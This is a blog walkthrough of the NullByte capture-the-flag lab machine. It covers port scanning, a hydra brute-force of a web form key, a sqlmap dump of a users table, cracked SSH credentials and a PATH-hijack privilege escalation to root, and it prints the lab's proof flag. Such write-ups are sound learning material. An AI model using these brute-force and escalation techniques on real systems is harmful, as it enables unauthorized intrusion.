Post

NullByte

Posted Updated
NullByte Machine !
NullByte Machine !
By Shivendra Prajapati
3 min read

Let’s find the IP Address first »

Untitled

1

IP : 10.0.2.32

Port Scan Results ➡️

Untitled

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

┌──(kali㉿kali)-[~/Downloads/Proving_Ground/NullByte]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.0.2.32
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 09:44 IST
Nmap scan report for 10.0.2.32
Host is up (0.0053s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http?
|_http-title: Null Byte 00 - level 1
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          44254/tcp6  status
|   100024  1          56237/udp   status
|   100024  1          57300/tcp   status
|_  100024  1          59382/udp6  status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 163013d9d55536e81bb7d9ba552fd744 (DSA)
|   2048 29aa7d2e608ba6a1c2bd7cc8bd3cf4f2 (RSA)
|   256 6006e3648f8a6fa7745a8b3fe1249396 (ECDSA)
|_  256 bcf7448d796a194876a3e24492dc13a2 (ED25519)
57300/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:5C:97:BB (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Enumeration ⤵️

Untitled

Now when I downloaded this ⬆️ eye image I recon over it through exiftool and I found this »

Untitled

Now When I used this string as a web Directory I got this »

Untitled

Source Code ⬇️

Untitled

Now I have to brute-force the keys to get the exact one »

1

sudo hydra 10.0.2.32 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -P /usr/share/wordlists/rockyou.txt -la

Untitled

After Entering this »

Untitled

I think this data processing workes from mysql so let’s try sqlmap now »

Untitled

1
2
3
4
5
6
7
8
9

Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+

Lets crack this password »

Untitled

Untitled

1
2

Credentials >>
ramses : omega

Lets SSH now ⤵️

Untitled

Untitled

Now I think ps command is executed here os lets run sh instead of ps on procwatch file →

So I have to change the Environment variable and include /tmp so that it can execute the sh directory which is copied in tmp directory →

Untitled

Now let’s run ./procwatch ⬇️

Untitled

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats. 
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com

USE THIS PGP PUBLIC KEY

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----

# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 08:00:27:5c:97:bb brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.32/24 brd 10.0.2.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe5c:97bb/64 scope link 
       valid_lft forever preferred_lft forever
# id    
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
#

I am root now !!

If you have any questions or suggestions, please leave a comment below. Thank You !

Proving Grounds, Play
Exiftool Password BruteForce PrivEsc
This post is licensed under CC BY 4.0 by the author.